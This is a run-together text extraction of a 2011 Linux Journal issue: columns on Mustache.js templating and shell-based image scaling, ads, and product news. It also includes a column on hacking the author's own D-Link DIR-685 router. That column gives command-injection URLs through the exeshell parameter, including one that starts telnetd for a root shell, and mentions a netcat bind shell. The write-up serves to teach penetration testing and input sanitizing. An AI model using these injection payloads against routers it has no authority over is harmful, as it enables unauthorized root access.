COLUMNSAT THE FORGEother templates I’ve used, Mustache.js isnot a fully fledged programming language,as you might expect. Rather, it’s a tightlydefined domain-specific language thatdescribes the page, but that doesn’t havethe potential to make templates intoanother code repository.So, this article explores Mustache.js—howto install and use it, as well as when it’sappropriate and how to use a few of themore-advanced features that come with it.TemplatesMany readers probably are familiar with atypical sort of template, with a style usedby PHP, ASP, JSP and Ruby’s ERb. Anythingthat should be executed goes in braces thatlook like this:And, anything you want to display on thescreen gets nearly the same sort of tag, butwith an = sign on the left:The good news with such templates isthat they’re rather easy to use. You don’thave to worry about which symbols meanwhat, or set up a file just to see someinterpolated variables. But on the otherhand, they’re too simple for producinglarge-scale reports and certainly for doingserious text manipulation.The other problem is that as soon asyou put code into your template, you’reviolating the rule of MVC, which is that youdon’t want to put very much executablecode in your template. Assigning variablesisn’t a good idea, but calling methods,not to mention retrieving rows from thedatabase, is something you normallydon’t want to be doing within your views.But, you can be even stricter in how youinterpret this no-execution policy. Whatif you could avoid all executable code,including if/then statements, loops andother things to which you’re accustomed?Mustache adopts this philosophy in thatit allows for a limited set of things to takeplace within the template. You could argue(and I’d probably believe you) that it’s goingtoo far to say, as the Mustache slogan says,that they’re “logic-less templates”. Indeed,Mustache templates do have a fair amountof logic in them. But the nature of thetemplating language ensures that the specialfunctions cannot be abused too terribly. Ifyou want to execute code, you’ll have to doit outside the realm of Mustache.(If you’re wondering, it’s called Mustachebecause it uses double-curly braces, {{ and }}, asdelimiters. Double-curly braces indicate whereyou want interpolation to take place, and theyalso delimit various control structures.)Installing Mustache.js couldn’t be easier.Download the single mustache.js file fromGitHub, put it in an appropriate directoryinside the JavaScript directory for your WebWWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 25


COLUMNSAT THE FORGEListing 1. Simple Use of MustacheTesting$(document).ready(function () {var template_vars = {name: 'Reuven',number_of_children: 3}var template = "{{name}} has{{number_of_children}} children.";var html = Mustache.to_html(template, template_vars);$('#target').html(html);});Testing testingThis is a paragraphThis space for rentapplication—or alongside your HTML file, ifyou’re just experimenting with it outside aframework—and you’re ready to go.Note that the inclusion of Mustache.jsdoesn’t turn your HTML file (or yourJavaScript file, for that matter) into aMustache template. Rather, it provides youwith a number of functions that can be26 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


COLUMNSAT THE FORGEListing 2. Replace Text in the TemplateTesting$(document).ready(function () {var template_vars = {proper_noun: 'Reuven',color: 'green',food: 'ice cream'}$(".template").each(function(index, value) {var current_html = $(this).html();var translated = Mustache.to_html(current_html, template_vars);$(this).html(translated);});});Testing testingThis is a paragraphMy name is {{proper_noun}}.I like to wear {{color}} shirts,and eat {{food}} for breakfast.WWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 27


COLUMNSAT THE FORGEapplied to text strings. You then can dowhatever you want with those text strings,from inserting them into a file to usingthem for further processing.Listing 1 contains a simple example ofusing Mustache.js. At the top of the section, I include both the jQuery library andMustache.js, as I often would in an HTML file.I then have a bit of JavaScript code executingin the standard $(document).readyfunction call, ensuring that it will be executedonly after jQuery has detected that theentire HTML document has loaded. Thisavoids a race condition, in which theJavaScript might or might not run beforethe HTML has been rendered.I then define a variable (template_vars), aJavaScript object with two properties, “name”and “number_of_children”. These propertiescan be of any data type, including a function.If a property is a function, it is evaluated wheninterpolated, and the result of the function’sevaluation is inserted into the template.I’ve then broken up the interpolationinto three distinct parts. First, I define thetext (the “template” variable) into whichI want to interpolate variables. Noticehow the string is a tiny template, and thatanything within {{ }} (double-curly braces) isevaluated as a variable by Mustache.js.Next, you apply your template_vars to thetemplate, getting some HTML back. You thencan do whatever you want with that HTML,including (most easily) replacing the text froman existing HTML tag. You also could havecreated a new node, replaced an existing oneor modified the text even further.In the end, I did something fairly simple,namely using jQuery’s “html” functionto replace the existing HTML with theimproved version.For something a bit more complex, whichresembles traditional HTML templatesa bit more, consider Listing 2. In thisexample, I decided to do a Mad Libs sort ofreplacement, but instead of changing text ina string, I changed it in the document itself.Using jQuery’s selectors, I chose all elementswith a “template” class. (This allows theauthor of the page to decide whether the{{ }} tags will be used on a particular tag.)Perhaps the most interesting and importantpart of this code is the callback functionI used to do the translation. Ratherthan using a typical jQuery loop, whichwould have turned into a rat’s nest of code,I decided to use the “each” function, whichiterates over a collection. In each iteration,$(this) refers to the item, and you next usethe Mustache.to_html function to translateit, and then replace the text with its transformedself. In this way, your JavaScripteasily can affect the text on the page.What happens if you ask Mustache touse a variable value that you have notdefined? It continues silently, using anempty string. This means that if yourtemplate_vars variable contains one ormore keys with misspelled names, youwon’t get any warnings.28 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


COLUMNSAT THE FORGEListing 3. LoopsTesting$(document).ready(function () {var template_vars = {name: 'Reuven',children: ['Atara', 'Shikma', 'Amotz']}var template = "{{name}} has childrennamed:{{#children}}{{.}}{{/children}}.";var html = Mustache.to_html(template, template_vars);$('#target').html(html);});Testing testingThis is a paragraphThis space for rentLoops and ConditionalsRemember when I wrote that I wouldn’tcall Mustache.js “logic-less templates”,because the templating language stillincludes conditionals? Well, now you cansee what I meant. (I should add that I’mWWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 29


COLUMNSAT THE FORGEfairly convinced I normally don’t want codeto be evaluated/executed in the template.But, conditionals and loops are two thingsthat every useful templating system I’ve hadhas incorporated, and they are a necessarypiece of logic for templates to be useful.)If you look at Listing 3, you’ll see howto create loops. I have added an array(“children”) inside my template_vars variable.But instead of saying {{children}} toretrieve the contents of the array, you insteadsay {{#children} at the beginning ofthe loop and {{/children} at its end.Mustache.js is smart enough to know whatto do, and it repeats the block within thesedelimiters, once for each element of thearray. To get the current array element itself,you use the special syntax {{.}}.That’s certainly some degree of logic,but it’s nothing compared with the{{#mycondition}} tag, which beginsthe equivalent of an if-then statement.But wait, what are you checking? Well,if you’re starting your condition with{{#mycondition}}, that means you’regoing to treat “mycondition” as a function,evaluating it at runtime and then displayingonly the contents of the block (that is,the stuff between {{#mycondition}}and {{/#mycondition}} if the functionreturns “true”).Mustache has a bunch of other featurestoo. It automatically escapes HTML bydefault, but it has a mechanism, {{{ }}}, thatuses raw HTML, without cleaning up the< and > symbols that can be both annoyingand potentially dangerous. So, you havethe flexibility to replace text as appropriatein your application.The examples I have provided obviouslyare somewhat contrived and simple.Fortunately, the syntax of Mustache.js issimple enough that it shouldn’t take verylong at all to incorporate it into your work.ConclusionMustache is a straightforward, butpowerful, templating system for JavaScript.If you’re starting to put together a Webapplication that needs to rewrite parts ofthe text based on AJAX calls or JavaScriptoutput, or if you’re writing a one-pageJavaScript-based application, you certainlyshould look into Mustache.js. The homepage on GitHub has good documentation,and other tutorials and documents arelinked from there as well.■Reuven M. Lerner is a longtime Web developer, architectand trainer. He is a PhD candidate in learning sciences atNorthwestern University, researching the design and analysisof collaborative on-line communities. Reuven lives with hiswife and three children in Modi’in, Israel.ResourcesThe home page for Mustache is mustache.github.com.For an interesting analysis of Mustache.js, as well as whereit could be improved (and a description of a fork), readYehuda Katz’s blog entry at yehudakatz.com/2010/09/09/announcing-handlebars-js.30 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


COLUMNSWORK THE SHELLWorking withImage FilesDAVE TAYLORRoll your own image inclusion utility.As an old-school tech guy, I can appreciate allthe shiny new widgets we have on our computerapplications, but I still usually prefer a commandline and being able to fine-tune exactly what’sproduced rather than just hope it’ll work. Thisis particularly true when it comes to HTMLgenerators and Web page creation tools.You need only look at the output ofMicrosoft Word’s “Save as HTML” featureto know what I mean. (All right, that’s nota fair comparison because it’s so bloodyghastly that even the Microsoft peopleavoid using Word for this purpose.)It’s fair to call me a prolific writer too,and much of what I write is for the on-lineworld. This gives me the chance to comparedifferent tools, and since I’m a bitof a perfectionist , it also lets mesee which content creation tools allow finetuningand which trap you in the worldtheir developers have created.In particular, I’m thinking of WordPress,a super-popular open-source bloggingutility, versus Movable Type, a more closeddevelopment tool that is unfortunately abit in limbo due to a change in corporateownership. My main blog, AskDaveTaylor.com,operates on Movable Type (as does theHuffington Post, among others), whereas thefilm reviews I write for ScienceFiction.comcome through its WordPress system.WordPress makes it complicated to addimages to your articles, and when it does, I findthat I invariably switch into the HTML sourceand tweak the code produced. If nothingelse, there’s always insufficient paddingbetween the image and the text adjacent,which is something I often puzzle about—how I can be the only person who notices?Movable Type could have the same issues,but because it doesn’t have such a fancy HTMLedit widget, it instead has encouraged me toroll my own image inclusion utility, and that’swhat we’re going to examine this month.scale.shThe purpose of the utility is to take an image,either in GIF, JPEG or PNG format, calculate itssize and produce the HTML necessary to haveit properly included in a blog post. To makeit more useful, it can automatically scale theimage dimensions in the HTML, add image32 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


COLUMNSWORK THE SHELLborders if needed and even add captions asspecified. Here’s a simple example of it at work:$ scale 1 ../Desktop/test-image.pngTo understand this, imagine we’reusing the original image with its 256x384dimensions. If we constrain it to a max of200 pixels in width, the multiplier can becalculated as:multiplier="0$(echo "scale=2 ; $maxwidth / $width" | bc)"It has lots of smarts, including the knowledgeto convert the local image into an equivalentURL that instead references the archive layouton my server, calculates height and width, andeven includes an ALT attribute (which is goodSEO juju) based on the name of the file.The 1 in the command invocation saysthat I want the image to be at its full size(scale=100%). To make it smaller, say 75%,I could invoke it as scale 0.75, and ifI wanted to constrain it by a specific pixelwidth, perhaps because of a page layoutissue, I can do that too with scale 200.The two most important lines in the scriptare those that invoke the terrific ImageMagickcommand-line utility identify and parsethe image dimensions:width="$(identify $filename | cut -f3 -d\ | cut -f1 -dx)"height="$(identify $filename | cut -f3 -d\ | cut -f2 -dx)"Extract a multiplier based on the startingparameter, and it’s then straightforward touse bc and get the new dimensions:width="$(echo "$width * $multiplier" | bc | cut -d. -f1)"height="$(echo "$height * $multiplier" | bc | cut -d. -f1)"Or, if we want to do the math ourselves,200/256 = 0.78. Calculate both dimensionsby that figure and we arrive at the scaleddownimage size of 200x300.SERVER• Fanless x86 500MHz/1GHz CPU• 512MB/1GB DDR2 RAM On Board• 4GB Compact Flash Disk• 10/100 Base-T Ethernet• Reliable (No CPU Fan or Disk Drive)• Two RS-232 Ports2.6 KERNEL• Four USB 2.0 Ports• Audio In / Out• Dimensions: 4.9 x 4.7 x 1.7” (125 x 120 x 44mm)Standard SIB(Server-In-a-Box)Starting at $305Quantity 1.Since 1985OVER25YEARS OFSINGLE BOARDSOLUTIONS• Power Supply Included• Locked Compact Flash Access• Analog SVGA 3D Video• Optional Wireless LAN• EMAC <strong>Linux</strong> 2.6 Kernel• Free Eclipse IDEEQUIPMENT MONITOR AND CONTROLPhone: (618) 529-4525 · Fax: (618) 457-0110 · Web: www.emacinc.comWWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 33


COLUMNSWORK THE SHELLIf the user specifies a percentile multiplier,say 0.75 for a 25% reduction in image size,then the math is even easier because, wedon’t have to calculate the multiplier. Italready has been specified by the user: 0.75.The resultant image: 192x288. Not rocketscience, but darn helpful.The Search Engine Impact of ScaledImagesThe problem that creeps up here is one that’stied more to search engine optimizationand so-called SERP, search engine resultsplacement. In a nutshell, slow-loading pagesnow are penalized in the search results, andif you’re loading up lots of large images andthen automatically scaling them down with theattributes in your HTML code, you’re hurtingyour page and its ability to rank well in usersearches—not good.If it’s a 10% shrinkage or you’re just shavingoff a few pixels to make it fit a particular pagedesign (for example, I keep my images to 500pixels or narrower on my DaveOnFilm.comsite), no worries. At that point, the differencein file size is usually negligible.This brings us to another important taskthat scale.sh performs: testing and warning ifyou’re going to be scaling an image down tothe point where you can experience an SERPpenalty. Here’s how that’s calculated:sizediff=$(echo "scale=3; ( $width / $owidth ) * 100" |bc | cut -d. -f1)owidth is the original width, so in thecase where we constrained the image to 200pixels, we’d have the mathematical formula:sizediff=( 200 / 256) * 100The cut -d. -f1 is the equivalent of the“floor” mathematical function; it just convertsa float back into an integer.Do the math, and sizediff = 78. Thatsounds right based on what we calculatedearlier with the multiplier. I’ve set anarbitrary limit so that anything that’s morethan a 20% reduction in size is worthy ofgenerating a warning message, like this:if [ $sizediff -lt 80 ] ; thenfiecho "*** Warning: $filename scaled to $sizediff%"echo ""Sure enough, if we run scale.sh with the200-pixel width constraint, here’s what we see:*** Warning: ../Desktop/test-image.png scaled to 77%In my next article, I’ll dig farther intothe script and describe some of the tricksI’m using to generate the best, smartestHTML code I can manage. In the meantime,think about how you are adding imagesto your own on-line content and whetheryour method is optimized for both the userexperience and the search engines.■Dave Taylor has been hacking shell scripts for a really long time,30 years. He’s the author of the popular Wicked Cool Shell Scriptsand can be found on Twitter as @DaveTaylor and more generallyat www.DaveTaylorOnline.com.34 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


LISA ’11: 25TH LARGE INSTALLATIONARGE INSTALLATIONSYSTEM ADMINISTRATION CONFERENCEDecember 4–9, <strong>2011</strong>BOSTON, MAThe Past,Present, andFuture of System AdministrationDEVOPS: NEW CHALLENGES, PROVEN VALUESKeynote Address: “The DevOps Transformation,” by Ben RockwoodClosing Session: “Tales from IBM’s Watson—Jeopardy! Champion”Join us for 6 days of practical training ontopics including:• Virtualization Series byinstructors such as John Arrasjid,Ben Lin, and Gerald Carter• Configuration Management byMark Burgess, Nan Liu, and more• Series on <strong>Linux</strong> and Becoming aSuperSysadminPlus a 3-day Technical Program:• Invited Talks by industry leaders suchas Michael Stonebraker, Bryan Cantrill,and Owen DeLong• Refereed Papers covering key topicssuch as migration, clusters, andpackage deployment• Workshops, Vendor Exhibition, Posters,BoFs, “Hallway Track,” and more!Register by November 14 and save • Additional discounts are available!www.usenix.org/lisa11/ljSponsored by in cooperation with LOPSA


COLUMNSHACK AND /PracticeHacking on YourHome RouterKYLE RANKINWhy hack someone else when an ideal target might be lurkingin your own network?Although it’s true that I tend to focusmostly on <strong>Linux</strong> in systems administration(after all, that is my day job), I’ve always hada secondary interest in security, whether it’shardening systems, performing forensicson a hacked system, getting root on a picoprojector or even trying my hand at findingand exploiting vulnerabilities. Even thoughit’s fun to set up your own Web services andattempt to exploit them, there’s somethingmore satisfying about finding vulnerabilitiesin someone else’s code. The downside,of course, is that most Webmasters don’tappreciate it when you break into their sites.However fun hacking is, at least for me, itisn’t worth the risk of jail time, so I need tohave my fun in more legal ways. This is wheremy wireless router comes in.Wireless routers have a long history ofbeing hackable. If you take any group of<strong>Linux</strong> geeks, you are bound to find a numberof them who have, or have had, a memberof the classic Linksys WRT series. If you lookon-line, there are all sorts of custom firmwareyou can install to extend its functionality.Although it’s true that on some versions ofthe router you have to jump through somecrazy hoops to install custom firmware, it’s stillnot the same kind of challenge as discoveringand exploiting a vulnerability on a server.Although I have a stack of WRT54G routers,this article isn’t about them; instead, it’s aboutthe D-Link DIR-685.The D-Link DIR-685I first became aware of the D-Link DIR-685during a Woot-Off on woot.com. If you arefamiliar with Woot-Offs, you understand thatwhen a new product shows up on the site,you have a limited time to decide whetheryou want to buy it before it disappears anda new product shows up. The moment Iread the specs, I knew this router lookedpromising. First, it was an 802.11n router,36 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


COLUMNSHACK AND /and I was in the market to upgrade frommy 802.11g network. Second, it had fivedifferent gigabit ports in the back along withtwo USB ports. Finally, as icing on the cake,it not only had this interesting-looking colorLCD on the front that could show statistics,photos or other data, but you also could slot a2.5" SATA drive up to 1Tb and turn the thinginto a small NAS. Based on the fact that itrequired an ext3 filesystem on the 2.5" drive,I reasonably could assume it even alreadyran <strong>Linux</strong>. I didn’t have much time to see ifanyone already had hacked into the router orcreated custom firmware, so I made up mymind and clicked the order button.While I was waiting for the router to ship tomy house, I did some extra research. Althoughunfortunately it looked like there wasn’t anycustom firmware I could find (this originallywas quite an expensive router, so I imagineit didn’t have a large install base), I did find asite from someone who documented how toopen up the router and wire up and connecta serial port to it, so you could access thelocal serial console. I decided that in the worstcase, if I couldn’t find a simpler method, Ialways could just go that route.When I got the router, I did the initial setupon my network via the Web interface andthen looked one last time for any customfirmware or other method apart from a serialconsole to get root on the router. I wasn’table to find anything, but before I went to thetrouble of taking it apart, I decided to pokearound on the Web interface and see if I sawanything obvious. The first dead end camewhen I enabled the FTP service via the Webinterface, yet was not able to find any knownvulnerabilities with that FTP server that I couldexploit. Unlike when I got root on my picoprojector, when I ran an nmap against themachine, I wasn’t lucky enough to have telnetwaiting for me:PORT STATE SERVICE21/tcp open ftp80/tcp open http139/tcp open netbios-ssn445/tcp open microsoft-dsOne Ping OnlyAs I continued searching though, I got myfirst clue: the ping test. The Web interfaceprovides a complete set of diagnostic toolsthat, among other things, allows you to pingremote machines to test for connectivity onhttp:///tools_vct.php (Figure 1).I figured there was a good chance that thePHP script just forwarded the hostnameor IP address you typed in to a system callthat ran ping, so I started by adding asemicolon and an ls command to my input.Unfortunately, there was a JavaScript routinethat sanitized the input, but what I noticedwas that after I submitted a valid input,the variable also showed up in the URL:http:///tools_vct.php?uptime=175036&pingIP=127.0.0.1.I discovered that although the page usedJavaScript to sanitize the input, it did notWWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 37


COLUMNSHACK AND /So, for instance, to perform a simple test ofcommand injection, you might attempt to adda sleep command. If the page seems to pausefor that amount of time before it reloads,that’s a good sign your command injectionworked. So, to attempt a sleep commandwith that page, my encoded URL to setpingIP to “127.0.0.1; sleep 30” looked likehttp:///tools_vct.php?uptime=175036&pingIP=127.0.0.1%3B%20sleep%2030.Figure 1. The Ping Testsanitize the POST data. In fact, I could putjust about anything I wanted as the value ofpingIP, and it would not only accept it, butbecause the PHP page displayed the valueof pingIP in the output, I also would see myvariable output in the resulting Web page,which opened up all sorts of possibilitiesfor JavaScript injection and XSS attacks. Ofcourse, none of that would help me get rooton the machine, so I started trying to figureout what kind of payload I could send thatwould allow me to execute system calls.No EscapeIt was at this point that I searched onlinefor a nice complete table of all of theURL escape codes. You may have noticedthat whenever you type a space in a URL,for instance, browsers these days tend toconvert it into %20. That is just one of manydifferent escape codes for symbols that arevalid to have in a URL in their escaped form.Table 1 shows some of the more useful onesfor what I was trying to achieve.“If it’s PHP, there will be a hole.”I iterated through all sorts of different symbolsand options to pass for pingIP, and nothing I triedseemed to have any effect. I was talking to afriend of mine about what I was trying and howI wasn’t turning up any usable hole yet, and I gotthe encouraging reply, “If it’s PHP, there willbe a hole.” I figured that if I already managedto find a JavaScript injection XSS vulnerability,if I kept looking, I had to find some way in. Idecided to forget about the ping page for awhile and try to find some other vulnerability.Table 1. URL Escape CodesESCAPE CODE%3B ;%3F ?%26 &%22 “%3C %7C |%60 `CHARACTER38 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


COLUMNSHACK AND /My next clue came when I looked intothe system tools page at http:///tools_system.php (Figure 2). A glaring itemon that page was the reboot button. Ifigured there was at least a chance that itmade some sort of system call, so I lookedinto the source for that Web page in mybrowser and noticed that when you clickedon the reboot button, the JavaScript calledthis URL: http:///sys_config_valid.xgi?exeshell=submit%20REBOOT.There’s nothing more reassuring than a CGIvariable named exeshell. Because I had allsorts of example encoded URLs from myping test, I decided to try enclosing a sleepcommand in backticks to see if it would exitto a shell—low and behold, it worked!Figure 2. System Tools PageThe PayloadOkay, so now I had a viable way to executeshell commands on the system. The nextquestion was how I was going to take


COLUMNSHACK AND /advantage of this to log in remotely. Myfirst approach was to try to execute netcat,have it listen on a high port, and use the-e argument so that it would execute ashell once I connected to that port—a poorman’s telnetd. After all, many consumerdevices that run <strong>Linux</strong> use BusyBox fortheir shell, and BusyBox often includes aversion of netcat that supports this option.Unfortunately, no combination of netcatarguments I tried seemed to do anything. Iwas starting to think that I didn’t get a shellafter all—that is, until I enclosed reboot inbackticks, and it rebooted the router.After the machine came back up, Idecided it was possible netcat just wasn’tinstalled, so it was then that I tried thefateful URL: http:///sys_config_valid.xgi?exeshell=%60telnetd%20%26%60.In case you don’t want to look it up,that converts into `telnetd &` as input.Sure enough, after I ran that command, mynmap output looked a bit different:PORT STATE SERVICE21/tcp open ftp23/tcp open telnet80/tcp open http139/tcp open netbios-ssn445/tcp open microsoft-dsThen, I fired up telnet from that same machine:$ telnet Trying ...Connected to .BusyBox v1.00 (2009.07.27-14:12+0000) Built-in shell (msh)Enter 'help' for a list of built-in commands.#I not only got a shell, but also a root shell!When I ran a ps command, I noticed mytelnetd process on the command line:sh -c `telnetd &` > /dev/consoleIt turns out any command you pass to exeshelljust gets passed to sh -c, so I didn’t needany fancy escaped backticks or ampersands,exeshell=telnetd would work just fine.ConclusionSo, what’s the moral to this story? Well, forone, don’t open up hardware and void itswarranty to get to a serial console when youcan get a shell from the Web interface. Two,JavaScript isn’t sufficient to sanitize inputs—ifyou accept POST data, you need to sanitizeit as well. Three, passing an input variabledirectly to sh is probably a bad idea. Finally,next time you want to try your hand at a bitof penetration testing, you don’t have to goany further than your own network. Hackingyour own hardware can be just as fun (andsafer) than hacking someone else.■Kyle Rankin is a Sr. Systems Administrator in the San FranciscoBay Area and the author of a number of books, including TheOfficial Ubuntu Server Book, Knoppix Hacks and Ubuntu Hacks.He is currently the president of the North Bay <strong>Linux</strong> Users’ Group.Escape character is '^]'.40 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


Zend PHP Conference<strong>October</strong> 17-20, <strong>2011</strong> – Santa Clara, CAJoin us at the largest gatheringof the PHP Community in <strong>2011</strong>Register Now4 days of exceptional technical presentations, tutorials and Keynotes from leading PHP expertsLearn about the latest developments in the fastestgrowing web-development languageDiscover more about PHP’s cost and time savingsBenefit from the know-how of internationallyrenowned speakers and industry expertsNetwork with other delegates, speakers, vendors andsuppliersArchitecture & Best PracticesTesting, Debugging, Profiling and QAZend FrameworkCloud Infrastructure, Managementand Application ServicesServer & OperationsRich Internet Apps and Mobile / Tablet -Flash / Flex / HTML 5 / Ajaxwww.zendcon.comNoSQL and Big DataStandards ComplianceUnsung ToolsReal World Case Studies, Designs andData ModelsPHP on the IBM iFollow ustwitter.com/zendconZendCon


NEW PRODUCTSRunRev’s LiveCode ServerLiveCode Server from RunRev is a new and novel solution that providesback-end and cloud services for mobile or desktop applications andprocesses. The advantage of LiveCode Server, says RunRev, is to enabledevelopers to create data-intensive apps with confidence that the sheervolume of information and files required are kept securely in the cloudand readily accessible. LiveCode is a programmable server environmentthat allows developers to write flexible CGI scripts, rather than obscuresymbolic languages. An English-like programming language is used todescribe server application logic quickly and build and deploy solutionsrapidly. Users can use the LiveCode server as a standalone engine toinstall on their own Mac OS or <strong>Linux</strong> hardware or utilize RunRev’s On-Revhosting service.www.runrev.comSencha Touch ChartsThe thrill ofSencha TouchCharts lies notmerely in theability to explorecomplex datasets with simplegestures on asmartphone or tablet, but more important, to do so using HTML5. Sencha says that itsnew Web app development framework renders charts at the same level of fidelity asnative apps without having to rely on native drawing packages. Sencha Touch Chartsrenders charts, captures multi-touch inputs and drives interactivity. A simple swipewill pan across a data set, whereas a “reverse pinch” will zoom into detail. Richerinteractions, such as axis swaps, aggregation, filtering and more, are all enabled bysimilarly simple gestures. The HTML5 Canvas technology is fully supported by the latestWebKit browsers that ship with Android, Apple iOS, BlackBerry OS6 and HP WebOS.www.sencha.com42 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


NEW PRODUCTSSSVV Narasimha Rao’s Sencha Touch1.0 Mobile JavaScript Framework(Packt Publishing)As long as we’re on the topic of Sencha Touch, allow usto note that extensive help already is available, so you canutilize the platform to maximum benefit. Narasimha Rao’sSencha Touch 1.0 Mobile JavaScript Framework teaches allone needs to know to get started with Sencha Touch and“build awesome mobile Web applications that look andfeel native on Apple iOS and Google Android touchscreen devices”, says publisherPackt Publishing. Beginning with an overview of Sencha Touch, the book guides usersthrough increasingly complex sample applications. Other topics include styling the UI,exploring Sencha Touch components and working with animations and data packagesusing comprehensive examples.www.packtpub.comLantronix and Timesys’ PremierWave ENThe new <strong>Linux</strong>-based, wireless device serverPremierWave EN is a collaborative effortbetween secure communication technologiesprovider Lantronix and embedded <strong>Linux</strong>specialist Timesys. PremierWave EN allowsdesign engineers and OEMs to add Wi-Fi andEthernet networking to virtually any deviceeasily. As a result, companies can transmitmedical, financial, customer or other importantdata securely across corporate networks. Lantronix applications, such as the AdvancedApplications Suite, tunneling applications, an enterprise-class command-line interface,management capability using a standard Web browser, diagnostic utilities, Ethernetto-WirelessLAN bridging and virtual IP are standard. A subscription to Timesys’<strong>Linux</strong>Link embedded <strong>Linux</strong> software development framework also is included.www.lantronix.com and www.timesys.comWWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 43


NEW PRODUCTSMcObject’s eXtremeDB ClusterStep one to database nirvana: clear your mind of the mostundelicious fast-food item imaginable out of your head (that is, aMcObject). Step two: with mind now clear, check out McObject’snew eXtremeDB Cluster, which the company bills as the firstclustering database system built especially for distributed embeddedsoftware and real-time enterprise applications. eXtremeDB Clustermanages data stores across multiple hardware nodes, whichincreases the net processing power available for data management;reduces system expansion costs; and delivers a scalable and reliabledatabase solution for increasingly data-intensive real-time applications.According to McObject’s benchmarks, eXtremeDB Cluster delivered a161% throughput improvement when scaling to four nodes from one.Targeted applications include carrier-grade telecom, algorithmic tradingapplications, SaaS platforms and the like.www.mcobject.comVector Fabrics’vfThreaded-x86 ToolTake your pick—expletives and ibuprofen orVector Fabrics’ vfThreaded-x86 Tool—to takethe pain out of the task of optimization andparallelization of applications for multicore x86architectures. The cloud-based software tool, whichis aimed at developers who write performance-centric code for high-performancecomputing, scientific, industrial, video or imaging applications, greatly reduces thetime involved and the risks associated with optimizing code for the latest multicorex86 processors. By using thorough dynamic and static code analysis techniques,vfThreaded-x86 quickly analyzes code and guides the developer to make the rightchoices for partitioning code to separate cores. This includes examining cache hit/miss effects, data bandwidth to memories and bandwidth between individual codesections. An intuitive GUI provides code visualizations that highlight code hotspotsand dependencies that might require partitioning trade-offs.www.vectorfabrics.com44 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


NEW PRODUCTSScott Mueller’s Upgrading and RepairingPCs, 20th Ed. (Que)Besides our fealty to <strong>Linux</strong>, there may be nothing else besidestinkering with our PCs that defines our <strong>Linux</strong> geek identity. Therefore,we know that books like Scott Mueller’s Upgrading and Repairing PCs,now in its 20th edition, will appeal to many of our readers. PublisherQue calls Mueller’s book “the definitive guide to the inner workingsof the latest PCs” and “with nearly 2.5 million copies sold, it’s the best-selling hardwareguide ever”. The book contains extensive information on troubleshooting problems,improving system performance and making the most of today’s best new hardware. Thelatest hardware innovations and repair techniques since the previous edition have beenadded. Ninety minutes of DVD video is included, covering insider information aboutseveral key PC components, including hard disk drives, power supplies, motherboards andso on. Besides presenting comprehensive coverage of every PC component, Mueller alsocovers overclocking, cooling, PC diagnostics, testing and maintenance.www.informit.comCutting Edge’s Power-Saving Cloud ArchiveFrom the “saving green by going green” newsdeskis Cutting Edge’s new Power-Saving Cloud Archive(PSCA), an energy-saving storage technology for thecloud. Cutting Edge describes PSCA’s advantages toinclude “extremely high performance and scalability, a low acquisition cost, up to a 90%power savings and a new low in TCO for organizations that are struggling to address therelentless flood of unstructured data and longer retention times”. Moreover, PSCA, saysthe company “is the ideal solution for today’s power-hungry storage environments wherethe cost to provide power and cooling for storage systems now actually exceeds the costto acquire the equipment being powered and cooled”. Cutting Edge’s technology is acombination of its fifth-generation EdgeWare unified storage software and multi-tieredarchiving, as well as innovative power-saving hardware and open systems.www.cuttedge.com/pscaPlease send information about releases of <strong>Linux</strong>-related products to newproducts@linuxjournal.com orNew Products c/o <strong>Linux</strong> <strong>Journal</strong>, PO Box 980985, Houston, TX 77098. Submissions are edited for length and content.WWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 45


NEW PROJECTSFresh from the Labsluakit—Extensible Micro Browserluakit.org/projects/luakitFellow control freaks, if you enjoy havingdominion over just about every aspect ofa program, I think you’ll like this. Inspiredby projects such as uzbl, and developed byfellow Perth-boy Mason Larobina, luakit is theWeb browser for those who like the elementof control. According to the Web site:to have fine-grained control over theirWeb browser’s behavior and interface.Installation Pre-made packages/binariesare available on the Web site for Gentoo,Arch <strong>Linux</strong>, Debian/Ubuntu and Fedora,along with the source code.As for library requirements, thedocumentation says you need the following:luakit is a highly configurable, microbrowserframework based on the WebKitWeb content engine and the GTK+ toolkit.It is very fast, extensible by Lua and licensedunder the GNU GPLv3 license.■ gtk2.■ Lua (5.1).■ lfs (lua filesystem).It is primarily targeted at power users,developers and any people with toomuch time on their hands who want■ libwebkit (webkit-gtk).■ libunique.It’s hard to notice the discreet tabs, with black for active and gray for inactive, but they’re very cool.46 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


NEW PROJECTSand make, combining the two—interesting.If you run into any errors here, chances arethat you’re missing a library dependencysomewhere; pay close attention to the output.Finally, to install luakit, if your distro usessudo, enter:$ sudo make installThis lightweight browser seems to run YouTubewith Flash just as well as Firefox and Chrome.■ sqlite3.If your distro uses root, enter:$ su# make install■ help2man.On my Kubuntu system, the lfs packagewas called liblua5.1-filesystem0.If you’re using the sourceand running into dependencyerrors, it’s worth tryingout the above libraries’development packages(usually named -dev) and doingthe luakit installation again.If you’re running with thesource, grab the latest tarballfrom the Web site, extract it,and open a terminal in the newfolder. Enter the command:Usage The actual interface is ratherunique. Like the lovechild of Chromeand Vim, the interface is part sleek and$ makeI’m not sure what resourcesMason has used here, butthis make script is kind of likea cross between ./configureProject code that’s both documented and diagrammed—now I’veseen everything!WWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 47


